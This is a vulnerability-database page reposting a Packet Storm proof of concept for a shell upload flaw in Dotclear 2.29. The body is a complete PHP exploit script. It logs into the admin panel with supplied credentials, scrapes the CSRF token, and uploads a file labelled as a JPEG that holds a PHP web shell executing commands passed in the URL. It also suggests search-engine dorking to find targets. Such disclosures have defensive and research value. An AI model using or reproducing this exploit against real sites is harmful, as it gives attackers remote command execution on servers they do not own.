Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Dotclear 2.29 Shell Upload

🗓️ 13 Mar 2025 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 267 Views

Dotclear 2.29 has a shell upload vulnerability allowing attackers to upload malicious PHP scripts.

Code
=============================================================================================================================================
    | # Title     : Dotclear 2.29 shell upload Vulnerability                                                                                    |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://github.com/dotclear/dotclear/archive/refs/heads/master.zip                                                          |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: A script is a way to test a vulnerability in file uploads on a website, where an attacker can upload a malicious file containing a PHP script that executes commands on the server. 
    
        This type of attack exploits websites that allow file uploads but do not adequately check the integrity of the files or ensure that the uploaded files do not contain malicious scripts.
    
       (Related : https://packetstorm.news/files/id/178892/ Related CVE numbers:  ) .
    	
    [+] save code as poc.php.
    
    [+] Usage = php script.php http://example.com admin password123
    
    [+] PayLoad :
    
    <?php
    function generate_filename($extension = ".inc") {
        $characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
        $filename = '';
        for ($i = 0; $i < 5; $i++) {
            $filename .= $characters[rand(0, strlen($characters) - 1)];
        }
        return $filename . $extension;
    }
    
    function get_csrf_token($response_text) {
        $doc = new DOMDocument();
        @$doc->loadHTML($response_text);
        $inputs = $doc->getElementsByTagName('input');
        foreach ($inputs as $input) {
            if ($input->getAttribute('name') === 'xd_check') {
                return $input->getAttribute('value');
            }
        }
        return null;
    }
    
    function login($base_url, $username, $password) {
        echo "Exploiting...\n";
        sleep(1);
        echo "Logging in...\n";
        sleep(1);
        $session = curl_init();
        $login_data = [
            'user_id' => $username,
            'user_pwd' => $password
        ];
        $login_url = "{$base_url}/admin/index.php?process=Auth";
        
        curl_setopt($session, CURLOPT_URL, $login_url);
        curl_setopt($session, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($session, CURLOPT_POST, true);
        curl_setopt($session, CURLOPT_POSTFIELDS, $login_data);
        $login_response = curl_exec($session);
        
        if (strpos($login_response, "Logout") !== false) {
            echo "Login Successful!\n";
            return $session;
        } else {
            echo "Login Failed!\n";
            return null;
        }
    }
    
    function upload_file($session, $base_url, $filename) {
        echo "Shell Preparing...\n";
        sleep(1);
        
        $boundary = "---------------------------376201441124932790524235275389";
        $headers = [
            "Content-Type: multipart/form-data; boundary={$boundary}",
            "X-Requested-With: XMLHttpRequest"
        ];
        
        // أولاً، ارسال طلب للحصول على CSRF token
        $media_url = "{$base_url}/admin/index.php?process=Media";  // تأكد من استخدام السلسلة بشكل صحيح
        curl_setopt($session, CURLOPT_URL, $media_url);
        curl_setopt($session, CURLOPT_RETURNTRANSFER, true);
        $media_response = curl_exec($session);
        $csrf_token = get_csrf_token($media_response);
    
        $payload = "--{$boundary}\r\n";
        $payload .= "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n2097152\r\n";
        $payload .= "--{$boundary}\r\n";
        $payload .= "Content-Disposition: form-data; name=\"xd_check\"\r\n\r\n{$csrf_token}\r\n";
        $payload .= "--{$boundary}\r\n";
        $payload .= "Content-Disposition: form-data; name=\"upfile[]\"; filename=\"{$filename}\"\r\n";
        $payload .= "Content-Type: image/jpeg\r\n\r\n";
        $payload .= "<html>\n<body>\n<form method=\"GET\" name=\"<?php echo basename(\$_SERVER['PHP_SELF']); ?>\">\n";
        $payload .= "<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input type=\"SUBMIT\" value=\"Execute\">\n";
        $payload .= "</form>\n<pre>\n<?php\nif(isset(\$_GET['cmd']))\n{\nsystem(\$_GET['cmd']);\n}\n?>\n</pre>\n</body>\n</html>\r\n";
        $payload .= "--{$boundary}--\r\n";
    
        // إرسال طلب الرفع
        $url = "{$base_url}/admin/index.php?process=Media&sortby=name&order=asc&nb=30&page=1&q=&file_mode=grid&file_type=&plugin_id=&popup=0&select=0";  // تأكد من تنسيق الرابط
        curl_setopt($session, CURLOPT_URL, $url);
        curl_setopt($session, CURLOPT_HTTPHEADER, $headers);
        curl_setopt($session, CURLOPT_POSTFIELDS, $payload);
        $upload_response = curl_exec($session);
    
        if ($upload_response) {
            echo "Your Shell is Ready: {$base_url}/public/{$filename}\n";
        } else {
            echo "Exploit Failed!\n";
        }
    }
    
    function main($base_url, $username, $password) {
        $filename = generate_filename();
        $session = login($base_url, $username, $password);
        if ($session) {
            upload_file($session, $base_url, $filename);
        }
    }
    
    if ($argc != 4) {
        echo "Usage: php script.php <siteurl> <username> <password>\n";
    } else {
        $base_url = $argv[1];
        $username = $argv[2];
        $password = $argv[3];
        main($base_url, $username, $password);
    }
    ?>
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Mar 2025 00:00Current
7.5High risk
Vulners AI Score7.5
dotclear vulnerabilityshell uploadphp scriptmalicious file uploadweb security exploit.
267